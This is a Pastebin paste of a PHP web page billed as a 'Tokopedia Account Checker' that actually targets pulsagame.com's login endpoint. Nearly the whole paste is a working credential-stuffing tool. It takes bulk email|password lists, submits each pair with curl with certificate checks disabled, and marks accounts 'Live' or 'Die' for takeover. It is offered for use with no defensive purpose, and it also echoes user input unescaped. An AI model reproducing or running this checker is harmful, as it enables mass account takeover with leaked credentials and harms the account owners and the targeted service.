Advertisement
AbdulMuttaqin

Tokopedia Account Checker 2018

Oct 1st, 2018
4,155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.98 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>Tokopedia Checker </title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <center>MAX 100 BIAR GAK 500 INTERNAL ERROR</CENTER>
  21. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  22.                                     <!-- Start .panel -->
  23.                                     <div class="panel-heading">
  24.                                         <h4 class="panel-title">Pulsagame[.]com account Checker</h4>
  25.                                     </div>
  26.                                     <div class="panel-body">
  27. <form action="" method="POST">
  28. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|passW0rd"><?php
  29. if (isset($_POST['mailpass'])) {
  30.     echo $_POST['mailpass'];
  31. }
  32. ?></textarea><br />
  33. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  34. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button>    <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  35. <?php
  36. if(isset($_POST['submit'])){
  37. $delim = $_POST['delim'];
  38. function search($line, $delim)
  39. {
  40.     $line = str_replace(" ", "", $line);
  41.     $line = explode($delim, $line);
  42.     $i    = 0;
  43.     while ($i < count($line)) {
  44.         if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  45.             $mail = $line[$i];
  46.             $pass = $line[$i + 1];
  47.             $i    = 10000;
  48.             if ($pass == "") {
  49.                 $pass = $line[$i - 1];
  50.             }
  51.         }
  52.         $i++;
  53.     }
  54.     $line = $mail . "|" . $pass;
  55.     $line = explode('|', $line);
  56.     return $line;
  57. }
  58. $data = $_POST['mailpass'];
  59. $extract = explode("\r\n", $data);
  60. $i = 0;
  61.     foreach ($extract AS $k => $line) {
  62.         $i++;
  63.         if (strpos($line, '=>') !== false) {
  64.             $line = str_replace('=>', '|', $line);
  65.         }
  66.         if (strpos($line, ']') !== false) {
  67.             $line = str_replace('=>', '|', $line);
  68.         }
  69.         if (strpos($line, '[') !== false) {
  70.             $line = str_replace('=>', '|', $line);
  71.         }
  72.  
  73.         $info = search(trim($line), $delim);
  74.         $email = trim($info[0]);
  75.         $pass   = $info[1];
  76.  
  77. $dir                   = dirname(__FILE__);
  78. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  79. if (!file_exists($config)) {
  80.     $fp = @fopen($config, 'w');
  81.     @fclose($fp);
  82. }
  83.  
  84. $cookie = 'cookie.txt';
  85. $ch = curl_init('https://www.pulsagame.com/ajax-login/');
  86. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  87. curl_setopt($ch,CURLOPT_POST,1);
  88.         curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  89.         curl_setopt($ch,CURLOPT_POST,TRUE);
  90.         curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  91.         curl_setopt($ch,CURLOPT_COOKIEFILE, "$config");
  92.         curl_setopt($ch,CURLOPT_COOKIEJAR,  "$config");
  93. curl_setopt($ch,CURLOPT_POSTFIELDS,"email=$email&password=$pass&Submit=login");
  94. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  95. $result = curl_exec($ch);
  96. $now = "<i style=\"color:blue\">Checked on Localhost at ".date("g:i a - F j, Y")."</i>";
  97. if(empty($result)){
  98. echo "<font color=gray><b>Kesalahan Username \/ Password</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  99. }elseif(preg_match('/salah/i',$result)){
  100. echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  101. }Else{
  102.  echo "<font color=green><b>Live</b></font> => ".$email."|".$pass."  | [ACC : Pulsagame] | ".$now."<br/>"; }
  103.  
  104. }
  105. }
  106.  
  107. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement